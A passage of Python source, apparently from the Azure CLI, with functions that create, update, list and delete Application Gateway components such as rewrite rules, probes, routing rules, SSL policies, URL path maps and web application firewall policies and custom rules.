return sdk_no_wait(no_wait, ncf.application_gateways.begin_create_or_update,
resource_group_name, application_gateway_name, ag)
def update_ag_backend_http_settings_collection(cmd, instance, parent, item_name, port=None, probe=None, protocol=None,
cookie_based_affinity=None, timeout=None,
connection_draining_timeout=None,
host_name=None, host_name_from_backend_pool=None,
affinity_cookie_name=None, enable_probe=None, path=None,
auth_certs=None, root_certs=None):
SubResource = cmd.get_models('SubResource')
if auth_certs == "":
instance.authentication_certificates = None
elif auth_certs is not None:
instance.authentication_certificates = [SubResource(id=x) for x in auth_certs]
if root_certs == "":
instance.trusted_root_certificates = None
elif root_certs is not None:
instance.trusted_root_certificates = [SubResource(id=x) for x in root_certs]
if port is not None:
instance.port = port
if probe is not None:
instance.probe = SubResource(id=probe)
if protocol is not None:
instance.protocol = protocol
if cookie_based_affinity is not None:
instance.cookie_based_affinity = cookie_based_affinity
if timeout is not None:
instance.request_timeout = timeout
if connection_draining_timeout is not None:
instance.connection_draining = {
'enabled': bool(connection_draining_timeout),
'drain_timeout_in_sec': connection_draining_timeout or 1
}
if host_name is not None:
instance.host_name = host_name
if host_name_from_backend_pool is not None:
instance.pick_host_name_from_backend_address = host_name_from_backend_pool
if affinity_cookie_name is not None:
instance.affinity_cookie_name = affinity_cookie_name
if enable_probe is not None:
instance.probe_enabled = enable_probe
if path is not None:
instance.path = path
return parent
def create_ag_redirect_configuration(cmd, resource_group_name, application_gateway_name, item_name, redirect_type,
target_listener=None, target_url=None, include_path=None,
include_query_string=None, no_wait=False):
ApplicationGatewayRedirectConfiguration, SubResource = cmd.get_models(
'ApplicationGatewayRedirectConfiguration', 'SubResource')
ncf = network_client_factory(cmd.cli_ctx).application_gateways
ag = ncf.get(resource_group_name, application_gateway_name)
new_config = ApplicationGatewayRedirectConfiguration(
name=item_name,
redirect_type=redirect_type,
target_listener=SubResource(id=target_listener) if target_listener else None,
target_url=target_url,
include_path=include_path,
include_query_string=include_query_string)
upsert_to_collection(ag, 'redirect_configurations', new_config, 'name')
return sdk_no_wait(no_wait, ncf.begin_create_or_update, resource_group_name, application_gateway_name, ag)
def update_ag_redirect_configuration(cmd, instance, parent, item_name, redirect_type=None,
target_listener=None, target_url=None, include_path=None,
include_query_string=None, raw=False):
SubResource = cmd.get_models('SubResource')
if redirect_type:
instance.redirect_type = redirect_type
if target_listener:
instance.target_listener = SubResource(id=target_listener)
instance.target_url = None
if target_url:
instance.target_listener = None
instance.target_url = target_url
if include_path is not None:
instance.include_path = include_path
if include_query_string is not None:
instance.include_query_string = include_query_string
return parent
def create_ag_rewrite_rule_set(cmd, resource_group_name, application_gateway_name, item_name, no_wait=False):
ApplicationGatewayRewriteRuleSet = cmd.get_models(
'ApplicationGatewayRewriteRuleSet')
ncf = network_client_factory(cmd.cli_ctx).application_gateways
ag = ncf.get(resource_group_name, application_gateway_name)
new_set = ApplicationGatewayRewriteRuleSet(name=item_name)
upsert_to_collection(ag, 'rewrite_rule_sets', new_set, 'name')
if no_wait:
return sdk_no_wait(no_wait, ncf.begin_create_or_update, resource_group_name, application_gateway_name, ag)
parent = sdk_no_wait(no_wait, ncf.begin_create_or_update,
resource_group_name, application_gateway_name, ag).result()
return find_child_item(parent, item_name,
path='rewrite_rule_sets', key_path='name')
def update_ag_rewrite_rule_set(instance, parent, item_name):
return parent
def create_ag_rewrite_rule(cmd, resource_group_name, application_gateway_name, rule_set_name, rule_name,
sequence=None, request_headers=None, response_headers=None, no_wait=False,
modified_path=None, modified_query_string=None, enable_reroute=None):
(ApplicationGatewayRewriteRule,
ApplicationGatewayRewriteRuleActionSet,
ApplicationGatewayUrlConfiguration) = cmd.get_models('ApplicationGatewayRewriteRule',
'ApplicationGatewayRewriteRuleActionSet',
'ApplicationGatewayUrlConfiguration')
ncf = network_client_factory(cmd.cli_ctx).application_gateways
ag = ncf.get(resource_group_name, application_gateway_name)
rule_set = find_child_item(ag, rule_set_name,
path='rewrite_rule_sets', key_path='name')
url_configuration = None
if any([modified_path, modified_query_string, enable_reroute]):
url_configuration = ApplicationGatewayUrlConfiguration(modified_path=modified_path,
modified_query_string=modified_query_string,
reroute=enable_reroute)
new_rule = ApplicationGatewayRewriteRule(
name=rule_name,
rule_sequence=sequence,
action_set=ApplicationGatewayRewriteRuleActionSet(
request_header_configurations=request_headers,
response_header_configurations=response_headers,
url_configuration=url_configuration
)
)
upsert_to_collection(rule_set, 'rewrite_rules', new_rule, 'name')
if no_wait:
return sdk_no_wait(no_wait, ncf.begin_create_or_update, resource_group_name, application_gateway_name, ag)
parent = sdk_no_wait(no_wait, ncf.begin_create_or_update,
resource_group_name, application_gateway_name, ag).result()
return find_child_item(parent, rule_set_name, rule_name,
path='rewrite_rule_sets.rewrite_rules', key_path='name.name')
def update_ag_rewrite_rule(instance, parent, cmd, rule_set_name, rule_name, sequence=None,
request_headers=None, response_headers=None,
modified_path=None, modified_query_string=None, enable_reroute=None):
with cmd.update_context(instance) as c:
c.set_param('rule_sequence', sequence)
c.set_param('action_set.request_header_configurations', request_headers)
c.set_param('action_set.response_header_configurations', response_headers)
ApplicationGatewayUrlConfiguration = cmd.get_models('ApplicationGatewayUrlConfiguration')
url_configuration = None
if any([modified_path, modified_query_string, enable_reroute]):
url_configuration = ApplicationGatewayUrlConfiguration(modified_path=modified_path,
modified_query_string=modified_query_string,
reroute=enable_reroute)
c.set_param('action_set.url_configuration', url_configuration)
return parent
def show_ag_rewrite_rule(cmd, resource_group_name, application_gateway_name, rule_set_name, rule_name):
client = network_client_factory(cmd.cli_ctx).application_gateways
gateway = client.get(resource_group_name, application_gateway_name)
return find_child_item(gateway, rule_set_name, rule_name,
path='rewrite_rule_sets.rewrite_rules', key_path='name.name')
def list_ag_rewrite_rules(cmd, resource_group_name, application_gateway_name, rule_set_name):
client = network_client_factory(cmd.cli_ctx).application_gateways
gateway = client.get(resource_group_name, application_gateway_name)
return find_child_collection(gateway, rule_set_name, path='rewrite_rule_sets.rewrite_rules', key_path='name')
def delete_ag_rewrite_rule(cmd, resource_group_name, application_gateway_name, rule_set_name, rule_name, no_wait=None):
client = network_client_factory(cmd.cli_ctx).application_gateways
gateway = client.get(resource_group_name, application_gateway_name)
rule_set = find_child_item(gateway, rule_set_name, path='rewrite_rule_sets', key_path='name')
rule = find_child_item(rule_set, rule_name, path='rewrite_rules', key_path='name')
rule_set.rewrite_rules.remove(rule)
sdk_no_wait(no_wait, client.begin_create_or_update, resource_group_name, application_gateway_name, gateway)
def create_ag_rewrite_rule_condition(cmd, resource_group_name, application_gateway_name, rule_set_name, rule_name,
variable, no_wait=False, pattern=None, ignore_case=None, negate=None):
ApplicationGatewayRewriteRuleCondition = cmd.get_models(
'ApplicationGatewayRewriteRuleCondition')
ncf = network_client_factory(cmd.cli_ctx).application_gateways
ag = ncf.get(resource_group_name, application_gateway_name)
rule = find_child_item(ag, rule_set_name, rule_name,
path='rewrite_rule_sets.rewrite_rules', key_path='name.name')
new_condition = ApplicationGatewayRewriteRuleCondition(
variable=variable,
pattern=pattern,
ignore_case=ignore_case,
negate=negate
)
upsert_to_collection(rule, 'conditions', new_condition, 'variable')
if no_wait:
return sdk_no_wait(no_wait, ncf.begin_create_or_update, resource_group_name, application_gateway_name, ag)
parent = sdk_no_wait(no_wait, ncf.begin_create_or_update,
resource_group_name, application_gateway_name, ag).result()
return find_child_item(parent, rule_set_name, rule_name, variable,
path='rewrite_rule_sets.rewrite_rules.conditions', key_path='name.name.variable')
def update_ag_rewrite_rule_condition(instance, parent, cmd, rule_set_name, rule_name, variable, pattern=None,
ignore_case=None, negate=None):
with cmd.update_context(instance) as c:
c.set_param('pattern', pattern)
c.set_param('ignore_case', ignore_case)
c.set_param('negate', negate)
return parent
def show_ag_rewrite_rule_condition(cmd, resource_group_name, application_gateway_name, rule_set_name,
rule_name, variable):
client = network_client_factory(cmd.cli_ctx).application_gateways
gateway = client.get(resource_group_name, application_gateway_name)
return find_child_item(gateway, rule_set_name, rule_name, variable,
path='rewrite_rule_sets.rewrite_rules.conditions', key_path='name.name.variable')
def list_ag_rewrite_rule_conditions(cmd, resource_group_name, application_gateway_name, rule_set_name, rule_name):
client = network_client_factory(cmd.cli_ctx).application_gateways
gateway = client.get(resource_group_name, application_gateway_name)
return find_child_collection(gateway, rule_set_name, rule_name,
path='rewrite_rule_sets.rewrite_rules.conditions', key_path='name.name')
def delete_ag_rewrite_rule_condition(cmd, resource_group_name, application_gateway_name, rule_set_name,
rule_name, variable, no_wait=None):
client = network_client_factory(cmd.cli_ctx).application_gateways
gateway = client.get(resource_group_name, application_gateway_name)
rule = find_child_item(gateway, rule_set_name, rule_name,
path='rewrite_rule_sets.rewrite_rules', key_path='name.name')
condition = find_child_item(rule, variable, path='conditions', key_path='variable')
rule.conditions.remove(condition)
sdk_no_wait(no_wait, client.begin_create_or_update, resource_group_name, application_gateway_name, gateway)
def create_ag_probe(cmd, resource_group_name, application_gateway_name, item_name, protocol, host,
path, interval=30, timeout=120, threshold=8, no_wait=False, host_name_from_http_settings=None,
min_servers=None, match_body=None, match_status_codes=None, port=None):
ApplicationGatewayProbe, ProbeMatchCriteria = cmd.get_models(
'ApplicationGatewayProbe', 'ApplicationGatewayProbeHealthResponseMatch')
ncf = network_client_factory(cmd.cli_ctx)
ag = ncf.application_gateways.get(resource_group_name, application_gateway_name)
new_probe = ApplicationGatewayProbe(
name=item_name,
protocol=protocol,
host=host,
path=path,
interval=interval,
timeout=timeout,
unhealthy_threshold=threshold)
if cmd.supported_api_version(min_api='2017-06-01'):
new_probe.pick_host_name_from_backend_http_settings = host_name_from_http_settings
new_probe.min_servers = min_servers
new_probe.match = ProbeMatchCriteria(body=match_body, status_codes=match_status_codes)
if cmd.supported_api_version(min_api='2019-04-01'):
new_probe.port = port
upsert_to_collection(ag, 'probes', new_probe, 'name')
return sdk_no_wait(no_wait, ncf.application_gateways.begin_create_or_update,
resource_group_name, application_gateway_name, ag)
def update_ag_probe(cmd, instance, parent, item_name, protocol=None, host=None, path=None,
interval=None, timeout=None, threshold=None, host_name_from_http_settings=None,
min_servers=None, match_body=None, match_status_codes=None, port=None):
if protocol is not None:
instance.protocol = protocol
if host is not None:
instance.host = host
if path is not None:
instance.path = path
if interval is not None:
instance.interval = interval
if timeout is not None:
instance.timeout = timeout
if threshold is not None:
instance.unhealthy_threshold = threshold
if host_name_from_http_settings is not None:
instance.pick_host_name_from_backend_http_settings = host_name_from_http_settings
if min_servers is not None:
instance.min_servers = min_servers
if match_body is not None or match_status_codes is not None:
ProbeMatchCriteria = \
cmd.get_models('ApplicationGatewayProbeHealthResponseMatch')
instance.match = instance.match or ProbeMatchCriteria()
if match_body is not None:
instance.match.body = match_body
if match_status_codes is not None:
instance.match.status_codes = match_status_codes
if port is not None:
instance.port = port
return parent
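# create_ag_request_routing_rule below fills in the gateway's first backend address pool, HTTP
# settings and listener when they are not given explicitly (unless a redirect configuration takes
# their place). The locals() lookup further down only recovers the string 'rewrite_rule_set' so
# that cmd.supported_api_version(parameter_name=...) can gate that option per API version.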
def create_ag_request_routing_rule(cmd, resource_group_name, application_gateway_name, item_name,
address_pool=None, http_settings=None, http_listener=None, redirect_config=None,
url_path_map=None, rule_type='Basic', no_wait=False, rewrite_rule_set=None,
priority=None):
ApplicationGatewayRequestRoutingRule, SubResource = cmd.get_models(
'ApplicationGatewayRequestRoutingRule', 'SubResource')
ncf = network_client_factory(cmd.cli_ctx)
ag = ncf.application_gateways.get(resource_group_name, application_gateway_name)
if not address_pool and not redirect_config:
address_pool = _get_default_id(ag, 'backend_address_pools', '--address-pool')
if not http_settings and not redirect_config:
http_settings = _get_default_id(ag, 'backend_http_settings_collection', '--http-settings')
if not http_listener:
http_listener = _get_default_id(ag, 'http_listeners', '--http-listener')
new_rule = ApplicationGatewayRequestRoutingRule(
name=item_name,
rule_type=rule_type,
priority=priority,
backend_address_pool=SubResource(id=address_pool) if address_pool else None,
backend_http_settings=SubResource(id=http_settings) if http_settings else None,
http_listener=SubResource(id=http_listener),
url_path_map=SubResource(id=url_path_map) if url_path_map else None)
if cmd.supported_api_version(min_api='2017-06-01'):
new_rule.redirect_configuration = SubResource(id=redirect_config) if redirect_config else None
rewrite_rule_set_name = next(key for key, value in locals().items() if id(value) == id(rewrite_rule_set))
if cmd.supported_api_version(parameter_name=rewrite_rule_set_name):
new_rule.rewrite_rule_set = SubResource(id=rewrite_rule_set) if rewrite_rule_set else None
upsert_to_collection(ag, 'request_routing_rules', new_rule, 'name')
return sdk_no_wait(no_wait, ncf.application_gateways.begin_create_or_update,
resource_group_name, application_gateway_name, ag)
def update_ag_request_routing_rule(cmd, instance, parent, item_name, address_pool=None,
http_settings=None, http_listener=None, redirect_config=None, url_path_map=None,
rule_type=None, rewrite_rule_set=None, priority=None):
SubResource = cmd.get_models('SubResource')
if address_pool is not None:
instance.backend_address_pool = SubResource(id=address_pool)
if http_settings is not None:
instance.backend_http_settings = SubResource(id=http_settings)
if redirect_config is not None:
instance.redirect_configuration = SubResource(id=redirect_config)
if http_listener is not None:
instance.http_listener = SubResource(id=http_listener)
if url_path_map is not None:
instance.url_path_map = SubResource(id=url_path_map)
if rule_type is not None:
instance.rule_type = rule_type
if rewrite_rule_set is not None:
instance.rewrite_rule_set = SubResource(id=rewrite_rule_set)
with cmd.update_context(instance) as c:
c.set_param('priority', priority)
return parent
def create_ag_ssl_certificate(cmd, resource_group_name, application_gateway_name, item_name, cert_data=None,
cert_password=None, key_vault_secret_id=None, no_wait=False):
ApplicationGatewaySslCertificate = cmd.get_models('ApplicationGatewaySslCertificate')
ncf = network_client_factory(cmd.cli_ctx)
ag = ncf.application_gateways.get(resource_group_name, application_gateway_name)
new_cert = ApplicationGatewaySslCertificate(
name=item_name, data=cert_data, password=cert_password, key_vault_secret_id=key_vault_secret_id)
upsert_to_collection(ag, 'ssl_certificates', new_cert, 'name')
return sdk_no_wait(no_wait, ncf.application_gateways.begin_create_or_update,
resource_group_name, application_gateway_name, ag)
def update_ag_ssl_certificate(instance, parent, item_name,
cert_data=None, cert_password=None, key_vault_secret_id=None):
if cert_data is not None:
instance.data = cert_data
if cert_password is not None:
instance.password = cert_password
if key_vault_secret_id is not None:
instance.key_vault_secret_id = key_vault_secret_id
return parent
def set_ag_ssl_policy_2017_03_01(cmd, resource_group_name, application_gateway_name, disabled_ssl_protocols=None,
clear=False, no_wait=False):
ApplicationGatewaySslPolicy = cmd.get_models('ApplicationGatewaySslPolicy')
ncf = network_client_factory(cmd.cli_ctx).application_gateways
ag = ncf.get(resource_group_name, application_gateway_name)
ag.ssl_policy = None if clear else ApplicationGatewaySslPolicy(
disabled_ssl_protocols=disabled_ssl_protocols)
return sdk_no_wait(no_wait, ncf.begin_create_or_update, resource_group_name, application_gateway_name, ag)
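# In set_ag_ssl_policy_2017_06_01 the policy type is always re-derived: Predefined when a policy
# name is supplied, Custom when cipher suites or a minimum protocol version are supplied, so any
# policy_type value passed in is effectively ignored.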
def set_ag_ssl_policy_2017_06_01(cmd, resource_group_name, application_gateway_name, policy_name=None, policy_type=None,
disabled_ssl_protocols=None, cipher_suites=None, min_protocol_version=None,
no_wait=False):
ApplicationGatewaySslPolicy, ApplicationGatewaySslPolicyType = cmd.get_models(
'ApplicationGatewaySslPolicy', 'ApplicationGatewaySslPolicyType')
ncf = network_client_factory(cmd.cli_ctx).application_gateways
ag = ncf.get(resource_group_name, application_gateway_name)
policy_type = None
if policy_name:
policy_type = ApplicationGatewaySslPolicyType.predefined.value
elif cipher_suites or min_protocol_version:
policy_type = ApplicationGatewaySslPolicyType.custom.value
ag.ssl_policy = ApplicationGatewaySslPolicy(
policy_name=policy_name,
policy_type=policy_type,
disabled_ssl_protocols=disabled_ssl_protocols,
cipher_suites=cipher_suites,
min_protocol_version=min_protocol_version)
return sdk_no_wait(no_wait, ncf.begin_create_or_update, resource_group_name, application_gateway_name, ag)
def show_ag_ssl_policy(cmd, resource_group_name, application_gateway_name):
return network_client_factory(cmd.cli_ctx).application_gateways.get(
resource_group_name, application_gateway_name).ssl_policy
def create_ag_trusted_root_certificate(cmd, resource_group_name, application_gateway_name, item_name, no_wait=False,
cert_data=None, keyvault_secret=None):
ApplicationGatewayTrustedRootCertificate = cmd.get_models('ApplicationGatewayTrustedRootCertificate')
ncf = network_client_factory(cmd.cli_ctx).application_gateways
ag = ncf.get(resource_group_name, application_gateway_name)
root_cert = ApplicationGatewayTrustedRootCertificate(name=item_name, data=cert_data,
key_vault_secret_id=keyvault_secret)
upsert_to_collection(ag, 'trusted_root_certificates', root_cert, 'name')
return sdk_no_wait(no_wait, ncf.begin_create_or_update,
resource_group_name, application_gateway_name, ag)
def update_ag_trusted_root_certificate(instance, parent, item_name, cert_data=None, keyvault_secret=None):
if cert_data is not None:
instance.data = cert_data
if keyvault_secret is not None:
instance.key_vault_secret_id = keyvault_secret
return parent
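# A URL path map is created together with one initial path rule (named by rule_name, 'default'
# unless overridden), and the default-* settings fall back to that rule's own pool/settings/redirect
# when not given. Hypothetical CLI example (flag names as typically exposed by the CLI):
#   az network application-gateway url-path-map create -g MyRG --gateway-name MyGw -n MyMap \
#       --paths '/images/*' --address-pool ImagesPool --http-settings AppSettings --rule-name images-rule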
def create_ag_url_path_map(cmd, resource_group_name, application_gateway_name, item_name, paths,
address_pool=None, http_settings=None, redirect_config=None, rewrite_rule_set=None,
default_address_pool=None, default_http_settings=None, default_redirect_config=None,
no_wait=False, rule_name='default', default_rewrite_rule_set=None, firewall_policy=None):
ApplicationGatewayUrlPathMap, ApplicationGatewayPathRule, SubResource = cmd.get_models(
'ApplicationGatewayUrlPathMap', 'ApplicationGatewayPathRule', 'SubResource')
ncf = network_client_factory(cmd.cli_ctx)
ag = ncf.application_gateways.get(resource_group_name, application_gateway_name)
new_rule = ApplicationGatewayPathRule(
name=rule_name,
backend_address_pool=SubResource(id=address_pool) if address_pool else None,
backend_http_settings=SubResource(id=http_settings) if http_settings else None,
paths=paths
)
new_map = ApplicationGatewayUrlPathMap(
name=item_name,
default_backend_address_pool=SubResource(id=default_address_pool) if default_address_pool else None,
default_backend_http_settings=SubResource(id=default_http_settings) if default_http_settings else None,
path_rules=[])
if cmd.supported_api_version(min_api='2017-06-01'):
new_rule.redirect_configuration = SubResource(id=redirect_config) if redirect_config else None
new_map.default_redirect_configuration = \
SubResource(id=default_redirect_config) if default_redirect_config else None
rewrite_rule_set_name = next(key for key, value in locals().items() if id(value) == id(rewrite_rule_set))
if cmd.supported_api_version(parameter_name=rewrite_rule_set_name):
new_rule.rewrite_rule_set = SubResource(id=rewrite_rule_set) if rewrite_rule_set else None
new_map.default_rewrite_rule_set = \
SubResource(id=default_rewrite_rule_set) if default_rewrite_rule_set else None
if cmd.supported_api_version(min_api='2019-09-01'):
new_rule.firewall_policy = SubResource(id=firewall_policy) if firewall_policy else None
# pull defaults from the rule specific properties if the default-* option isn't specified
if new_rule.backend_address_pool and not new_map.default_backend_address_pool:
new_map.default_backend_address_pool = new_rule.backend_address_pool
if new_rule.backend_http_settings and not new_map.default_backend_http_settings:
new_map.default_backend_http_settings = new_rule.backend_http_settings
if new_rule.redirect_configuration and not new_map.default_redirect_configuration:
new_map.default_redirect_configuration = new_rule.redirect_configuration
new_map.path_rules.append(new_rule)
upsert_to_collection(ag, 'url_path_maps', new_map, 'name')
return sdk_no_wait(no_wait, ncf.application_gateways.begin_create_or_update,
resource_group_name, application_gateway_name, ag)
def update_ag_url_path_map(cmd, instance, parent, item_name, default_address_pool=None,
default_http_settings=None, default_redirect_config=None, raw=False,
default_rewrite_rule_set=None):
SubResource = cmd.get_models('SubResource')
if default_address_pool == '':
instance.default_backend_address_pool = None
elif default_address_pool:
instance.default_backend_address_pool = SubResource(id=default_address_pool)
if default_http_settings == '':
instance.default_backend_http_settings = None
elif default_http_settings:
instance.default_backend_http_settings = SubResource(id=default_http_settings)
if default_redirect_config == '':
instance.default_redirect_configuration = None
elif default_redirect_config:
instance.default_redirect_configuration = SubResource(id=default_redirect_config)
if default_rewrite_rule_set == '':
instance.default_rewrite_rule_set = None
elif default_rewrite_rule_set:
instance.default_rewrite_rule_set = SubResource(id=default_rewrite_rule_set)
return parent
def create_ag_url_path_map_rule(cmd, resource_group_name, application_gateway_name, url_path_map_name,
item_name, paths, address_pool=None, http_settings=None, redirect_config=None,
firewall_policy=None, no_wait=False, rewrite_rule_set=None):
ApplicationGatewayPathRule, SubResource = cmd.get_models('ApplicationGatewayPathRule', 'SubResource')
if address_pool and redirect_config:
raise CLIError("Cannot reference a BackendAddressPool when Redirect Configuration is specified.")
ncf = network_client_factory(cmd.cli_ctx)
ag = ncf.application_gateways.get(resource_group_name, application_gateway_name)
url_map = next((x for x in ag.url_path_maps if x.name == url_path_map_name), None)
if not url_map:
raise CLIError('URL path map "{}" not found.'.format(url_path_map_name))
default_backend_pool = SubResource(id=url_map.default_backend_address_pool.id) \
if (url_map.default_backend_address_pool and not redirect_config) else None
default_http_settings = SubResource(id=url_map.default_backend_http_settings.id) \
if url_map.default_backend_http_settings else None
new_rule = ApplicationGatewayPathRule(
name=item_name,
paths=paths,
backend_address_pool=SubResource(id=address_pool) if address_pool else default_backend_pool,
backend_http_settings=SubResource(id=http_settings) if http_settings else default_http_settings)
if cmd.supported_api_version(min_api='2017-06-01'):
default_redirect = SubResource(id=url_map.default_redirect_configuration.id) \
if (url_map.default_redirect_configuration and not address_pool) else None
new_rule.redirect_configuration = SubResource(id=redirect_config) if redirect_config else default_redirect
rewrite_rule_set_name = next(key for key, value in locals().items() if id(value) == id(rewrite_rule_set))
if cmd.supported_api_version(parameter_name=rewrite_rule_set_name):
new_rule.rewrite_rule_set = SubResource(id=rewrite_rule_set) if rewrite_rule_set else None
if cmd.supported_api_version(min_api='2019-09-01'):
new_rule.firewall_policy = SubResource(id=firewall_policy) if firewall_policy else None
upsert_to_collection(url_map, 'path_rules', new_rule, 'name')
return sdk_no_wait(no_wait, ncf.application_gateways.begin_create_or_update,
resource_group_name, application_gateway_name, ag)
def delete_ag_url_path_map_rule(cmd, resource_group_name, application_gateway_name, url_path_map_name,
item_name, no_wait=False):
ncf = network_client_factory(cmd.cli_ctx)
ag = ncf.application_gateways.get(resource_group_name, application_gateway_name)
url_map = next((x for x in ag.url_path_maps if x.name == url_path_map_name), None)
if not url_map:
raise CLIError('URL path map "{}" not found.'.format(url_path_map_name))
url_map.path_rules = \
[x for x in url_map.path_rules if x.name.lower() != item_name.lower()]
return sdk_no_wait(no_wait, ncf.application_gateways.begin_create_or_update,
resource_group_name, application_gateway_name, ag)
def set_ag_waf_config_2016_09_01(cmd, resource_group_name, application_gateway_name, enabled,
firewall_mode=None,
no_wait=False):
ApplicationGatewayWebApplicationFirewallConfiguration = cmd.get_models(
'ApplicationGatewayWebApplicationFirewallConfiguration')
ncf = network_client_factory(cmd.cli_ctx).application_gateways
ag = ncf.get(resource_group_name, application_gateway_name)
ag.web_application_firewall_configuration = \
ApplicationGatewayWebApplicationFirewallConfiguration(
enabled=(enabled == 'true'), firewall_mode=firewall_mode)
return sdk_no_wait(no_wait, ncf.begin_create_or_update, resource_group_name, application_gateway_name, ag)
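# For the 2017-03-01+ WAF config, whole rule groups passed via disabled_rule_groups are recorded
# directly, while individual rule IDs in disabled_rules are resolved against the full rule-set
# listing (group='*') so each ID can be filed under its owning rule group.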
def set_ag_waf_config_2017_03_01(cmd, resource_group_name, application_gateway_name, enabled,
firewall_mode=None,
rule_set_type='OWASP', rule_set_version=None,
disabled_rule_groups=None,
disabled_rules=None, no_wait=False,
request_body_check=None, max_request_body_size=None, file_upload_limit=None,
exclusions=None):
ApplicationGatewayWebApplicationFirewallConfiguration = cmd.get_models(
'ApplicationGatewayWebApplicationFirewallConfiguration')
ncf = network_client_factory(cmd.cli_ctx).application_gateways
ag = ncf.get(resource_group_name, application_gateway_name)
ag.web_application_firewall_configuration = \
ApplicationGatewayWebApplicationFirewallConfiguration(
enabled=(enabled == 'true'), firewall_mode=firewall_mode, rule_set_type=rule_set_type,
rule_set_version=rule_set_version)
if disabled_rule_groups or disabled_rules:
ApplicationGatewayFirewallDisabledRuleGroup = cmd.get_models('ApplicationGatewayFirewallDisabledRuleGroup')
disabled_groups = []
# disabled groups can be added directly
for group in disabled_rule_groups or []:
disabled_groups.append(ApplicationGatewayFirewallDisabledRuleGroup(rule_group_name=group))
def _flatten(collection, expand_property_fn):
for each in collection:
for value in expand_property_fn(each):
yield value
# for disabled rules, we have to look up the IDs
if disabled_rules:
results = list_ag_waf_rule_sets(ncf, _type=rule_set_type, version=rule_set_version, group='*')
for group in _flatten(results, lambda r: r.rule_groups):
disabled_group = ApplicationGatewayFirewallDisabledRuleGroup(
rule_group_name=group.rule_group_name, rules=[])
for rule in group.rules:
if str(rule.rule_id) in disabled_rules:
disabled_group.rules.append(rule.rule_id)
if disabled_group.rules:
disabled_groups.append(disabled_group)
ag.web_application_firewall_configuration.disabled_rule_groups = disabled_groups
if cmd.supported_api_version(min_api='2018-08-01'):
ag.web_application_firewall_configuration.request_body_check = request_body_check
ag.web_application_firewall_configuration.max_request_body_size_in_kb = max_request_body_size
ag.web_application_firewall_configuration.file_upload_limit_in_mb = file_upload_limit
ag.web_application_firewall_configuration.exclusions = exclusions
return sdk_no_wait(no_wait, ncf.begin_create_or_update, resource_group_name, application_gateway_name, ag)
def show_ag_waf_config(cmd, resource_group_name, application_gateway_name):
return network_client_factory(cmd.cli_ctx).application_gateways.get(
resource_group_name, application_gateway_name).web_application_firewall_configuration
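# list_ag_waf_rule_sets filters the available rule sets client-side: with no group the individual
# rules are stripped from the output, group='*' keeps every group with its rules, and any other
# value keeps only the group with that name.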
def list_ag_waf_rule_sets(client, _type=None, version=None, group=None):
results = client.list_available_waf_rule_sets().value
filtered_results = []
# filter by rule set name or version
for rule_set in results:
if _type and _type.lower() != rule_set.rule_set_type.lower():
continue
if version and version.lower() != rule_set.rule_set_version.lower():
continue
filtered_groups = []
for rule_group in rule_set.rule_groups:
if not group:
rule_group.rules = None
filtered_groups.append(rule_group)
elif group.lower() == rule_group.rule_group_name.lower() or group == '*':
filtered_groups.append(rule_group)
if filtered_groups:
rule_set.rule_groups = filtered_groups
filtered_results.append(rule_set)
return filtered_results
# endregion
# region ApplicationGatewayWAFPolicy
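# A WAF policy is created with a single mandatory managed rule set (OWASP 3.0 by default) and no
# overrides; custom rules and exclusions are attached by the commands further below. Hypothetical
# CLI example: az network application-gateway waf-policy create -g MyRG -n MyWafPolicy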
def create_ag_waf_policy(cmd, client, resource_group_name, policy_name,
location=None, tags=None, rule_set_type='OWASP',
rule_set_version='3.0'):
WebApplicationFirewallPolicy, ManagedRulesDefinition, \
ManagedRuleSet = cmd.get_models('WebApplicationFirewallPolicy',
'ManagedRulesDefinition',
'ManagedRuleSet')
# https://docs.microsoft.com/en-us/azure/application-gateway/waf-overview
# mandatory default rule with empty rule sets
managed_rule_set = ManagedRuleSet(rule_set_type=rule_set_type, rule_set_version=rule_set_version)
managed_rule_definition = ManagedRulesDefinition(managed_rule_sets=[managed_rule_set])
waf_policy = WebApplicationFirewallPolicy(location=location, tags=tags, managed_rules=managed_rule_definition)
return client.create_or_update(resource_group_name, policy_name, waf_policy)
def update_ag_waf_policy(cmd, instance, tags=None):
with cmd.update_context(instance) as c:
c.set_param('tags', tags)
return instance
def list_ag_waf_policies(cmd, resource_group_name=None):
return _generic_list(cmd.cli_ctx, 'web_application_firewall_policies', resource_group_name)
# endregion
# region ApplicationGatewayWAFPolicyRules PolicySettings
def update_waf_policy_setting(cmd, instance,
state=None, mode=None,
max_request_body_size_in_kb=None, file_upload_limit_in_mb=None,
                              request_body_check=None):
if state is not None:
instance.policy_settings.state = state
if mode is not None:
instance.policy_settings.mode = mode
if max_request_body_size_in_kb is not None:
instance.policy_settings.max_request_body_size_in_kb = max_request_body_size_in_kb
if file_upload_limit_in_mb is not None:
instance.policy_settings.file_upload_limit_in_mb = file_upload_limit_in_mb
if request_body_check is not None:
instance.policy_settings.request_body_check = request_body_check
return instance
def list_waf_policy_setting(cmd, client, resource_group_name, policy_name):
return client.get(resource_group_name, policy_name).policy_settings
# endregion
# region ApplicationGatewayWAFPolicyRules
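# Custom WAF rules are created without match conditions; conditions are attached afterwards via
# add_waf_custom_rule_match_cond. Hypothetical CLI example (flag names as typically exposed):
#   az network application-gateway waf-policy custom-rule create -g MyRG --policy-name MyWafPolicy \
#       -n BlockBadBots --priority 50 --rule-type MatchRule --action Block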
def create_waf_custom_rule(cmd, client, resource_group_name, policy_name, rule_name, priority, rule_type, action):
"""
    Initialize a custom rule for the WAF policy.
"""
WebApplicationFirewallCustomRule = cmd.get_models('WebApplicationFirewallCustomRule')
waf_policy = client.get(resource_group_name, policy_name)
new_custom_rule = WebApplicationFirewallCustomRule(
name=rule_name,
action=action,
match_conditions=[],
priority=priority,
rule_type=rule_type
)
upsert_to_collection(waf_policy, 'custom_rules', new_custom_rule, 'name')
parent = client.create_or_update(resource_group_name, policy_name, waf_policy)
return find_child_item(parent, rule_name, path='custom_rules', key_path='name')
# pylint: disable=unused-argument
def update_waf_custom_rule(instance, parent, cmd, rule_name, priority=None, rule_type=None, action=None):
with cmd.update_context(instance) as c:
c.set_param('priority', priority)
c.set_param('rule_type', rule_type)
c.set_param('action', action)
return parent
def show_waf_custom_rule(cmd, client, resource_group_name, policy_name, rule_name):
waf_policy = client.get(resource_group_name, policy_name)
return find_child_item(waf_policy, rule_name, path='custom_rules', key_path='name')
def list_waf_custom_rules(cmd, client, resource_group_name, policy_name):
return client.get(resource_group_name, policy_name).custom_rules
def delete_waf_custom_rule(cmd, client, resource_group_name, policy_name, rule_name, no_wait=None):
waf_policy = client.get(resource_group_name, policy_name)
